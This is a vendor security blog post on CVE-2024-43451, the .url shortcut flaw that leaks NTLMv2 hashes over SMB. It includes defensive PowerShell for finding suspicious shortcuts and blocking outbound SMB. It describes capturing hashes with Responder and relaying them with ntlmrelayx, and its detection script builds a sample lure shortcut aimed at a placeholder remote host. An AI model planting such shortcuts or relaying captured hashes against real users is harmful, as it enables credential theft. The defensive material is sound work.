
Mitigating CVE-2024-43451 and Other Zero-Day Vulnerabilities Before They Are Discovered

Published December 03, 2024 by Dekel Paz

Microsoft’s Patch Tuesday on November 12, 2024 disclosed a zero-day vulnerability that had already been seen exploited in the wild. CVE-2024-43451 lets an attacker craft a malicious Internet Shortcut (.url) file that makes the victim’s machine open an SMB connection to an external server, leaking the user’s NTLMv2 hash in the process. The catch is how little user interaction is needed to trigger it: a single right-click on the file, dragging it into another folder, or even attempting to delete it is enough.

The common cycle in the cybersecurity industry, a vulnerability is discovered in the wild, everyone waits for an official patch, and then rushes to apply it everywhere, is clearly not working. It leaves a wide window in which adversaries can use the vulnerability before we are deemed safe, and the cycle repeats as soon as the next zero-day is found (not to mention unpublished vulnerabilities or ones without available patches). How can we break this cycle and make sure we are protected in the first place?

Zero-Day Attack Details: CVE-2024-43451

To exploit this vulnerability, all an attacker needs to do is create a simple shortcut file whose URL points at a server they control. On unpatched Windows hosts, a right-click on the file is all it takes. Even on patched hosts, if the user actually opens the file, their NTLMv2 hash is still sent to the attacker’s server, because following a UNC path to a remote host is ordinary SMB behaviour rather than a bug.

Malicious shortcut configured to disclose the victim’s NTLMv2 hash to an external server 

Using a tool like Responder, the attacker captures the victim’s NTLMv2 challenge-response, which is sent over the SMB protocol. The authentication can be relayed in real time to another machine (with a relay tool such as ntlmrelayx) to execute code there, or the captured response can be cracked offline to recover the original password.

The Responder tool captures the user’s NTLMv2 hash that was leaked from the URL file 

For additional technical information on the vulnerability, check out ClearSky’s report

The Challenge With Zero-Day CVE-2024-43451 

The vulnerability was used during a campaign targeting Ukrainian assets by UAC-0194, a suspected Russian threat actor. The main concern with this vulnerability is that it allows attackers to obtain NTLMv2 hashes with minimal interaction from the user, hashes which can then be relayed to other hosts or cracked offline (note that an NTLMv2 challenge-response cannot itself be used for pass-the-hash, which requires the NT hash). Several factors make this vulnerability particularly challenging to defend against:

  1. The communication back to the attacker’s server is established over the SMB protocol, which is rarely monitored closely and can be challenging to inspect (compared to other external-reaching protocols such as HTTP, HTTPS and DNS). 
  2. The URL file format looks innocent and does not immediately raise red flags the way an executable would. Even if the user does suspect the file and decides to delete it, that action also triggers the vulnerability. 
  3. The vulnerability affects practically all supported versions of Windows (with slight variations in trigger conditions). 
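Because the .url file format looks harmless (item 2 above), it helps to be able to spot the one thing a CVE-2024-43451 lure must contain: a target that is a UNC or file:// path to a remote host, which is what forces the SMB authentication. The following PowerShell is an added example, not code from the original post or from Zero Networks. It parses .url files (INI text with a URL= line under [InternetShortcut]) and flags targets whose host is not internal. The "internal" definition is an assumption: RFC 1918 addresses, dot-less NetBIOS-style names, and the hypothetical DNS suffix .corp.example. The three sample files are constructed in a temp folder, and 203.0.113.10 is a documentation-only address.

```powershell
# Added example (not code from the original post or from Zero Networks): hunt a directory
# tree for .url Internet Shortcut files whose target is a UNC or file:// path, the one
# ingredient CVE-2024-43451 needs to force an outbound SMB authentication.
# Assumptions: RFC 1918 addresses, dot-less NetBIOS names and the hypothetical suffix
# ".corp.example" count as internal; everything else is flagged External.

function Test-PrivateIPv4 {
    param([string]$Address)
    $ip = $null
    if (-not [System.Net.IPAddress]::TryParse($Address, [ref]$ip)) { return $false }
    if ($ip.AddressFamily -ne [System.Net.Sockets.AddressFamily]::InterNetwork) { return $false }
    $b = $ip.GetAddressBytes()
    return ($b[0] -eq 10) -or
           ($b[0] -eq 172 -and $b[1] -ge 16 -and $b[1] -le 31) -or
           ($b[0] -eq 192 -and $b[1] -eq 168)
}

function Get-UrlFileTarget {
    # A .url file is INI text; the target is the URL= line under [InternetShortcut].
    param([string]$Content)
    $m = [regex]::Match($Content, '(?im)^\s*URL\s*=\s*(\S.*?)\s*$')
    if ($m.Success) { return $m.Groups[1].Value }
    return $null
}

function Get-SuspiciousUrlFile {
    param(
        [Parameter(Mandatory)][string]$Root,
        [string]$InternalSuffix = '.corp.example'   # assumption: replace with your AD DNS suffix
    )
    Get-ChildItem -LiteralPath $Root -Filter *.url -File -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $target = Get-UrlFileTarget (Get-Content -LiteralPath $_.FullName -Raw)
        # Both \\host\share and file://host/share make Explorer open an SMB session to "host".
        # A local file:///C:/... target has no host component and is therefore not matched.
        if ($target -and $target -match '^(?:file://|\\\\)([^\\/]+)') {
            $remote = $Matches[1]
            $verdict = if (Test-PrivateIPv4 $remote) { 'Internal' }
                       elseif ($remote -notmatch '\.') { 'Internal' }              # NetBIOS-style name
                       elseif ($remote.ToLower().EndsWith($InternalSuffix)) { 'Internal' }
                       else { 'External' }
            [pscustomobject]@{
                Path       = $_.FullName
                Target     = $target
                RemoteHost = $remote
                Verdict    = $verdict
            }
        }
    }
}

# --- Constructed sample input: three shortcut files in a temp folder. 203.0.113.10 is a
# --- documentation-only address (TEST-NET-3), not a real attacker server. ---
$sample = Join-Path $env:TEMP ('urlhunt-' + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path $sample | Out-Null
$files = @{
    'benign.url'   = "[InternetShortcut]`r`nURL=https://www.example.com/`r`n"
    'internal.url' = "[InternetShortcut]`r`nURL=\\fileserver.corp.example\share\doc.docx`r`n"
    'leak.url'     = "[InternetShortcut]`r`nURL=file://203.0.113.10/share/report.pdf`r`n"
}
foreach ($name in $files.Keys) {
    Set-Content -LiteralPath (Join-Path $sample $name) -Value $files[$name] -NoNewline
}

# benign.url has no host to authenticate to and is skipped; internal.url is reported as
# Internal; only leak.url comes back as External.
Get-SuspiciousUrlFile -Root $sample | Format-Table RemoteHost, Verdict, Path -AutoSize
Remove-Item -LiteralPath $sample -Recurse -Force
```

Point -Root at user Downloads folders, mail attachment caches or a file share to hunt for planted shortcuts; every External hit is worth looking at, since a legitimate .url file almost never needs to reach an Internet host over SMB.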

The conventional cybersecurity approach recommends installing updates promptly across the organization, starting with the critical infrastructure. This of course will help mitigate this vulnerability, but can bring its own set of challenges: 

  1. Installing updates across an entire computer network can be challenging, especially when aiming for full coverage of all hosts and time is of the essence. 
  2. Starting with critical infrastructure (i.e. servers) is not the right approach in this case, as clients are more likely to be affected by this attack than servers. In addition, forcing updates on end users’ computers, which we don’t always have full control over, can consume more time. 
  3. We are still left with our same approach, hoping that vendors discover and patch vulnerabilities quickly enough before attacks get to use them in our environment. 

Zero Networks offers a more active approach to defend the organization, using network segmentation to prevent this and similar vulnerabilities from being used. 

How to Mitigate Unknown Threats: Leverage a Network Outbound Block

When applying network segmentation – we often think about how to protect an asset from incoming traffic, usually by applying firewall rules to prevent other hosts from communicating with it using sensitive protocols (such as RDP, SMB and RPC). With Zero Networks’ Segmentation platform, we also allow you to deploy outbound rules on all your assets. These rules can cover internal and/or external traffic and are applied even when the asset is not connected to the corporate network (such as when working remotely). 

Outbound rule configured to block all SMB traffic to the Internet 

In the case of CVE-2024-43451, all we needed to do in advance (and what should be done as good practice in any network) was to create a simple outbound rule for our assets that blocks any communication to the Internet over SMB. As this protocol is almost always used only internally, the block rule should have no operational effect. This fully mitigates this and any future vulnerability that relies on SMB to communicate with the outside world. The same can be done for similar protocols, such as RDP and RPC. If some assets do require these protocols to reach external hosts (for example administrators managing cloud assets), a specific rule can allow them to reach specific Internet IP addresses over the required ports. One caveat worth knowing: when TCP 445 is unreachable, Windows can retry a UNC path over WebDAV (HTTP, via the WebClient service), which can also carry NTLM authentication, so where the WebClient service is not needed, disabling it closes that fallback as well.

In the following image, we can see the CVE first being exploited while outbound SMB traffic is allowed. Once our outbound block rule is enabled and we rerun the attack, the traffic is blocked. This prevents the attacker from obtaining NTLMv2 hashes, and also stops the compromised victim from downloading additional malware over the same channel.

Traffic from the asset to the malicious server, first allowed (before setting the outbound rule) and then blocked 
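For hosts that are not covered by a segmentation platform, the same outbound block can be expressed with the built-in Windows Defender Firewall cmdlets. The script below is an added example, not Zero Networks’ rule or code from the original post. It creates a block rule for TCP 445 (and legacy 139) to every IPv4 address outside RFC 1918 in all firewall profiles (so it still applies off the corporate network), turns on logging of dropped connections so the block also becomes a detection signal (item 1 under the challenges above), verifies the rule is actually scoped to 445 before trusting it, and parses pfirewall.log lines to show which host tried to speak SMB to which external address. The rule name and the assumption that all legitimate SMB destinations live in RFC 1918 space are mine; the log lines are constructed and use documentation-only addresses. Run it from an elevated PowerShell.

```powershell
# Added example (not Zero Networks' rule or code from the original post): the outbound SMB
# block from the text, built with the Windows Defender Firewall cmdlets. Run elevated.
# Assumptions: the rule name below, and that every legitimate SMB destination is inside
# RFC 1918 (adjust the ranges if your internal address plan uses other space).

$RuleName = 'Block outbound SMB to Internet'

# IPv4 space outside 10/8, 172.16/12 and 192.168/16 (loopback never traverses the firewall).
$NonPrivateIPv4 = @(
    '1.0.0.0-9.255.255.255',
    '11.0.0.0-172.15.255.255',
    '172.32.0.0-192.167.255.255',
    '192.169.0.0-223.255.255.255'
)

function Set-OutboundSmbBlock {
    param([string]$Name = $RuleName, [string[]]$RemoteAddress = $NonPrivateIPv4)
    # Idempotent: drop any earlier copy, then create the block rule in every profile so it
    # still applies when the laptop is at home or on hotel Wi-Fi. Block rules win over allow
    # rules in Windows Firewall, so internal ranges are carved out by omission, not by an allow.
    Get-NetFirewallRule -DisplayName $Name -ErrorAction SilentlyContinue | Remove-NetFirewallRule
    New-NetFirewallRule -DisplayName $Name -Direction Outbound -Action Block -Enabled True `
        -Profile Any -Protocol TCP -RemotePort '445', '139' -RemoteAddress $RemoteAddress `
        -Description 'Stops NTLM leaks over SMB to external hosts (e.g. CVE-2024-43451 .url files)' |
        Out-Null
}

function Enable-BlockedConnectionLogging {
    # Outbound SMB is rarely watched; logging each drop turns the rule into a detection signal.
    # Entries land in %SystemRoot%\System32\LogFiles\Firewall\pfirewall.log.
    Set-NetFirewallProfile -All -LogBlocked True -LogMaxSizeKilobytes 32767
}

function Test-OutboundSmbBlockRule {
    # Verifies the rule is present, enabled, blocking, and really scoped to port 445.
    param([string]$Name = $RuleName)
    $rule = Get-NetFirewallRule -DisplayName $Name -ErrorAction SilentlyContinue
    if (-not $rule -or $rule.Enabled -ne 'True' -or $rule.Action -ne 'Block') { return $false }
    $ports = ($rule | Get-NetFirewallPortFilter).RemotePort
    return ($ports -contains '445')
}

function Get-BlockedSmbEgress {
    # Parses pfirewall.log lines and returns outbound (SEND) drops to SMB ports: which host
    # tried to talk SMB to which external address. Field order follows the log's "#Fields:" header.
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match '^#' -or -not $line.Trim()) { continue }
        $f = $line -split '\s+'
        # date time action protocol src-ip dst-ip src-port dst-port ... path
        if ($f[2] -eq 'DROP' -and $f[3] -eq 'TCP' -and ($f[7] -in @('445', '139')) -and $f[-1] -eq 'SEND') {
            [pscustomobject]@{ Time = "$($f[0]) $($f[1])"; Source = $f[4]; Destination = $f[5]; Port = $f[7] }
        }
    }
}

# Constructed sample log lines (203.0.113.10 and 198.51.100.7 are documentation-only addresses):
$sampleLog = @(
    '#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path',
    '2024-12-03 10:15:22 DROP TCP 192.168.1.20 203.0.113.10 51234 445 52 S 1234567 0 64240 - - - SEND',
    '2024-12-03 10:15:23 ALLOW TCP 192.168.1.20 198.51.100.5 51235 443 52 S 1234568 0 64240 - - - SEND',
    '2024-12-03 10:15:24 DROP TCP 198.51.100.7 192.168.1.20 40000 445 52 S 1234569 0 64240 - - - RECEIVE'
)

Set-OutboundSmbBlock
Enable-BlockedConnectionLogging
"Rule in place and scoped to 445: $(Test-OutboundSmbBlockRule)"
# Only the 10:15:22 line qualifies: an outbound SYN to port 445 on a non-private address.
Get-BlockedSmbEgress -Lines $sampleLog | Format-Table -AutoSize
```

In production, push the same rule through Group Policy rather than per host, and feed pfirewall.log (or the equivalent events from your EDR) into the SIEM; a workstation that suddenly attempts SMB to an Internet address right after a user touched a .url file is exactly the signal this CVE would otherwise leave unobserved.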

Adopt a Proactive Cybersecurity Approach to Mitigate Zero-Days Before They Happen: Network Segmentation

To mitigate CVE-2024-43451 and other zero-days before they are discovered, organizations should adopt a proactive approach to cybersecurity that goes beyond the traditional patch management cycle. Here are key strategies to implement:

Maximize Cyber Resilience with a Zero Trust Architecture

  • Ensure critical protection against unauthorized access and emerging threats by verifying every access attempt, regardless of source
  • Reduce your attack surface and limit the blast radius of a breach by limiting potential entry points and isolating every asset on your network via microsegmentation

Safeguard Domain Controllers and RPC Calls with RPCFW

Network Segmentation and Outbound Traffic Control

Enforce The Principle of Least Privilege

  • Enforce continuous verification of users, devices, and applications - this is essential as 61% of data breaches involve credentials
  • Restrict user permissions and access rights to the minimum necessary for their roles and layer just-in-time MFA to admin and service accounts
  • Implement strong access controls and regularly review and update them

Robust Endpoint Protection with Microsegmentation

Network segmentation is a crucial component of a proactive cybersecurity approach, enabling organizations to mitigate zero-day vulnerabilities before they are discovered. By implementing a Zero Trust architecture with granular access controls, organizations can significantly reduce their attack surface and limit the potential impact of breaches. This strategy, combined with robust endpoint protection and the principle of least privilege, creates a resilient security posture that can effectively defend against both known and unknown threats.
